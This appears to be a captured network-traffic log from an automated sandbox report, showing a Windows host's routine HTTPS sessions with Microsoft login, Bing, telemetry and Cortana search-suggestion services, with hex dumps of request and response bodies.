2024-09-26 15:55:36 UTC	174	IN	Data Raw: 67 30 61 5f 30 63 2e 63 73 73 3f 6f 72 3d 77 0d 0a 68 74 74 70 73 3a 2f 2f 72 2e 62 69 6e 67 2e 63 6f 6d 2f 72 73 2f 35 57 2f 32 35 47 2f 6f 72 74 6c 2c 63 63 2c 6e 63 2f 6f 6e 72 61 37 50 51 6c 39 6f 35 62 59 54 32 6c 41 53 49 31 42 45 34 44 44 45 73 2e 63 73 73 3f 6f 72 3d 77 0d 0a 68 74 74 70 73 3a 2f 2f 72 2e 62 69 6e 67 2e 63 6f 6d 2f 72 73 2f 36 73 2f 66 48 2f 6e 6a 2f 61 41 42 4c 4e 54 5f 46 56 34 35 51 6a 59 51 66 6e 52 48 72 42 43 41 6b 34 47 55 2e 6a 73 3f 6f 72 3d 77 0d 0a 4e 45 54 57 4f 52 4b 3a 0d 0a 2a Data Ascii: g0a_0c.css?or=whttps://r.bing.com/rs/5W/25G/ortl,cc,nc/onra7PQl9o5bYT2lASI1BE4DDEs.css?or=whttps://r.bing.com/rs/6s/fH/nj/aABLNT_FV45QjYQfnRHrBCAk4GU.js?or=wNETWORK:*

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.16	49807	40.126.32.68	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:36 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4828 Host: login.live.com
2024-09-26 15:55:36 UTC	4828	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-26 15:55:36 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 26 Sep 2024 15:54:36 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C538_SN1 x-ms-request-id: 9cf0d73e-2392-4d2c-af7b-5c316c12bdb2 PPServer: PPV: 30 H: SN1PEPF0002F94F V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 26 Sep 2024 15:55:35 GMT Connection: close Content-Length: 11177
2024-09-26 15:55:36 UTC	11177	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.16	49808	23.1.33.206	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:36 UTC	797	OUT	GET /rb/17/jnc,nj/4bnLx4S3ZRMpYV30k3R5vRy8JVg.js?bu=DygxeIQBiQGMAYEBe37EAccBMbcBMcoB&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
2024-09-26 15:55:36 UTC	1226	IN	HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Mon, 23 Sep 2024 06:53:05 GMT X-EventID: 66f1dd22c3ff4f098b657f8670f02713 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: BNZEEAP00016A75 X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=192707 Expires: Sat, 28 Sep 2024 21:27:23 GMT Date: Thu, 26 Sep 2024 15:55:36 GMT Content-Length: 21924 Connection: close Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.98200117.1727366136.be918f8 Timing-Allow-Origin: *
2024-09-26 15:55:36 UTC	15158	IN	Data Raw: 2f 2a 21 44 69 73 61 62 6c 65 4a 61 76 61 73 63 72 69 70 74 50 72 6f 66 69 6c 65 72 2a 2f 0a 76 61 72 20 42 4d 3d 42 4d 7c 7c 7b 7d 3b 42 4d 2e 63 6f 6e 66 69 67 3d 7b 42 3a 7b 74 69 6d 65 6f 75 74 3a 31 65 33 2c 64 65 6c 61 79 3a 37 35 30 2c 6d 61 78 55 72 6c 4c 65 6e 67 74 68 3a 33 30 30 2c 73 65 6e 64 6c 69 6d 69 74 3a 32 30 2c 6d 61 78 50 61 79 6c 6f 61 64 53 69 7a 65 3a 37 65 33 7d 2c 56 3a 7b 64 69 73 74 61 6e 63 65 3a 32 30 7d 2c 4e 3a 7b 6d 61 78 55 72 6c 4c 65 6e 67 74 68 3a 33 30 30 7d 2c 45 3a 7b 62 75 66 66 65 72 3a 33 30 2c 74 69 6d 65 6f 75 74 3a 35 65 33 2c 6d 61 78 55 72 6c 4c 65 6e 67 74 68 3a 33 30 30 7d 2c 43 3a 7b 64 69 73 74 61 6e 63 65 3a 35 30 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 76 74 28 29 7b 69 Data Ascii: /!DisableJavascriptProfiler/var BM=BM\|\|{};BM.config={B:{timeout:1e3,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:7e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:50}},function(n){function vt(){i
2024-09-26 15:55:36 UTC	6766	IN	Data Raw: 6e 64 2c 69 29 2c 70 74 3d 74 28 6f 2e 72 65 71 75 65 73 74 53 74 61 72 74 2c 69 29 2c 77 74 3d 74 28 6f 2e 72 65 73 70 6f 6e 73 65 53 74 61 72 74 2c 69 29 2c 62 74 3d 74 28 6f 2e 72 65 73 70 6f 6e 73 65 45 6e 64 2c 69 29 2c 6f 74 3d 6e 75 6c 6c 2c 73 74 3d 6e 2e 6c 61 79 6f 75 74 28 29 3b 66 6f 72 28 74 74 3d 30 3b 74 74 3c 73 74 2e 6c 65 6e 67 74 68 3b 74 74 2b 2b 29 7b 76 61 72 20 62 3d 73 74 5b 74 74 5d 2c 64 74 3d 62 2e 5f 65 2c 68 74 3d 62 2e 5f 73 3b 69 66 28 68 74 26 26 67 3d 3d 3d 68 74 29 7b 6f 74 3d 62 2e 69 3b 62 2e 78 3c 68 2e 77 26 26 62 2e 79 3c 68 2e 68 26 26 28 66 3d 65 74 29 3b 62 72 65 61 6b 7d 7d 72 74 3d 7b 5f 72 3a 6f 2c 74 3a 65 74 2c 69 3a 70 2e 6c 65 6e 67 74 68 2c 6c 3a 6f 74 2c 68 3a 77 5b 31 5d 2c 70 3a 77 5b 32 5d 2e 6c 65 6e Data Ascii: nd,i),pt=t(o.requestStart,i),wt=t(o.responseStart,i),bt=t(o.responseEnd,i),ot=null,st=n.layout();for(tt=0;tt<st.length;tt++){var b=st[tt],dt=b._e,ht=b._s;if(ht&&g===ht){ot=b.i;b.x<h.w&&b.y<h.h&&(f=et);break}}rt={_r:o,t:et,i:p.length,l:ot,h:w[1],p:w[2].len

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.16	49809	51.104.15.253	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:37 UTC	684	OUT	POST /Collector/3.0/?qsp=true&content-type=application%2Fbond-compact-binary&client-id=NO_AUTH&sdk-version=AWT-Web-CJS-1.2.0&x-apikey=33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176 HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: browser.pipe.aria.microsoft.com Content-Length: 987 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 15:55:37 UTC	987	OUT	Data Raw: 6d 09 0b 01 4a 33 33 64 37 30 61 38 36 34 35 39 39 34 39 36 62 39 38 32 61 33 39 66 30 33 36 66 37 31 31 32 32 2d 32 30 36 34 37 30 33 65 2d 33 61 39 64 2d 34 64 39 30 2d 38 33 36 32 2d 65 65 63 30 38 64 66 66 65 38 65 38 2d 37 31 37 36 0a 01 49 12 61 63 74 5f 64 65 66 61 75 6c 74 5f 73 6f 75 72 63 65 a9 24 38 38 63 34 32 33 65 63 2d 66 31 35 33 2d 34 34 34 35 2d 61 36 63 34 2d 62 35 65 62 32 39 63 61 62 36 31 33 d1 06 ce fa db f0 c5 64 cb 08 0a 01 29 24 32 36 35 37 36 30 34 38 2d 61 30 61 34 2d 34 35 33 34 2d 39 61 36 34 2d 35 31 65 37 61 33 31 39 30 34 39 63 71 ec ea db f0 c5 64 a9 14 63 75 73 74 6f 6d 2e 43 6c 69 65 6e 74 5f 45 76 65 6e 74 73 c9 06 0e 76 61 72 69 61 6e 74 5f 65 76 65 6e 74 73 cd 0d 09 09 19 0a 64 65 76 69 63 65 54 79 70 65 07 44 45 53 Data Ascii: mJ33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176Iact_default_source$88c423ec-f153-4445-a6c4-b5eb29cab613d)$26576048-a0a4-4534-9a64-51e7a319049cqdcustom.Client_Eventsvariant_eventsdeviceTypeDES
2024-09-26 15:55:37 UTC	462	IN	HTTP/1.1 200 OK Content-Length: 0 Content-Type: application/json Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 time-delta-millis: 1666 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST Access-Control-Allow-Headers: Accept, Content-Type, Content-Encoding, Client-Id Access-Control-Expose-Headers: kill-tokens, kill-duration-seconds, time-delta-millis Date: Thu, 26 Sep 2024 15:55:36 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.16	49812	204.79.197.200	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:37 UTC	2345	OUT	GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cmd&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=2f3ed6de36a14f3ebfed8e293d185e72&ig=ab8cc421015045729b90f8501479ca3a HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1727366134 X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x640 X-BM-DeviceDimensionsLogical: 784x640 X-BM-DeviceScale: 100 X-BM-DTZ: -240 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75 X-Device-ClientSession: 64942352AA494B6483DE4D15F1BB38FC X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2 X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-09-26 15:55:37 UTC	1188	IN	HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Length: 4514 Content-Type: application/json; charset=utf-8 Expires: -1 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Set-Cookie: _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: MUIDB=5047E5942BB2460EA35B53CCF78DDB3D; expires=Tue, 21-Oct-2025 15:55:37 GMT; path=/; HttpOnly X-EventID: 66f583f9eb954046b50009c79786b293 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 2EEE6F7D750A4940B122460DE0091EC8 Ref B: EWR30EDGE0807 Ref C: 2024-09-26T15:55:37Z Date: Thu, 26 Sep 2024 15:55:36 GMT Connection: close
2024-09-26 15:55:37 UTC	1068	IN	Data Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 63 6d 64 22 2c 22 71 75 65 72 79 22 3a 22 63 Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=cmd","query":"c
2024-09-26 15:55:37 UTC	2061	IN	Data Raw: 64 ee 80 81 20 69 70 63 6f 6e 66 69 67 22 2c 22 48 69 67 68 43 6f 6e 66 69 64 65 6e 63 65 4d 65 74 61 53 75 67 67 65 73 74 69 6f 6e 53 63 6f 72 65 22 3a 30 2c 22 50 72 65 66 65 74 63 68 43 6f 6e 66 69 64 65 6e 63 65 53 63 6f 72 65 22 3a 30 7d 2c 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 63 6d 64 2b 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 2c 22 71 75 65 72 79 22 3a 22 63 6d 64 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 2c 22 73 74 79 70 65 22 3a 22 41 53 22 2c 22 6c 6d 22 3a 22 31 30 30 30 3a 5c 22 30 5c 22 3b 32 32 30 30 3a 5c 22 31 33 5c 22 3b 33 30 30 30 31 3a 5c 22 31 32 38 33 36 5c 22 3b 32 31 35 32 3a 5c 22 31 35 38 32 30 5c 22 3b 32 30 30 30 3a 5c 22 31 32 36 30 38 37 5c 22 3b 32 30 31 31 3a Data Ascii: d ipconfig","HighConfidenceMetaSuggestionScore":0,"PrefetchConfidenceScore":0},{"Attributes":{"url":"/search?q=cmd+administrator","query":"cmd administrator","stype":"AS","lm":"1000:\"0\";2200:\"13\";30001:\"12836\";2152:\"15820\";2000:\"126087\";2011:
2024-09-26 15:55:37 UTC	1385	IN	Data Raw: 37 30 34 39 5c 22 3b 32 31 35 32 3a 5c 22 31 37 39 31 34 5c 22 3b 32 30 30 30 3a 5c 22 31 32 30 39 37 5c 22 3b 32 30 31 31 3a 5c 22 31 30 5c 22 3b 31 31 30 33 34 3a 5c 22 35 35 37 38 39 38 39 30 36 5c 22 3b 22 2c 22 68 63 73 22 3a 22 30 22 7d 2c 22 54 65 78 74 22 3a 22 ee 80 80 63 6d 64 ee 80 81 20 68 6f 73 74 6e 61 6d 65 22 2c 22 48 69 67 68 43 6f 6e 66 69 64 65 6e 63 65 4d 65 74 61 53 75 67 67 65 73 74 69 6f 6e 53 63 6f 72 65 22 3a 30 2c 22 50 72 65 66 65 74 63 68 43 6f 6e 66 69 64 65 6e 63 65 53 63 6f 72 65 22 3a 30 7d 2c 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 73 74 79 70 65 22 3a 22 51 50 22 2c 22 68 63 22 3a 22 31 22 2c 22 68 63 73 22 3a 22 31 22 2c 22 61 70 70 49 64 22 3a 22 7b 31 41 43 31 34 45 37 37 2d 30 32 45 37 2d 34 45 35 44 2d 42 37 Data Ascii: 7049\";2152:\"17914\";2000:\"12097\";2011:\"10\";11034:\"557898906\";","hcs":"0"},"Text":"cmd hostname","HighConfidenceMetaSuggestionScore":0,"PrefetchConfidenceScore":0},{"Attributes":{"stype":"QP","hc":"1","hcs":"1","appId":"{1AC14E77-02E7-4E5D-B7

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.16	49810	204.79.197.200	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:37 UTC	2343	OUT	GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=c&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=2f3ed6de36a14f3ebfed8e293d185e72&ig=6e3b69b5871b441ca54bf33441a9e1fe HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1727366134 X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x640 X-BM-DeviceDimensionsLogical: 784x640 X-BM-DeviceScale: 100 X-BM-DTZ: -240 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75 X-Device-ClientSession: 64942352AA494B6483DE4D15F1BB38FC X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2 X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-09-26 15:55:37 UTC	1188	IN	HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Length: 5820 Content-Type: application/json; charset=utf-8 Expires: -1 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Set-Cookie: _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: MUIDB=5047E5942BB2460EA35B53CCF78DDB3D; expires=Tue, 21-Oct-2025 15:55:37 GMT; path=/; HttpOnly X-EventID: 66f583f9c23645089c0e86f4323f799e UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: E067B600FD3C4AC897062FCFFF88620F Ref B: EWR30EDGE1113 Ref C: 2024-09-26T15:55:37Z Date: Thu, 26 Sep 2024 15:55:37 GMT Connection: close
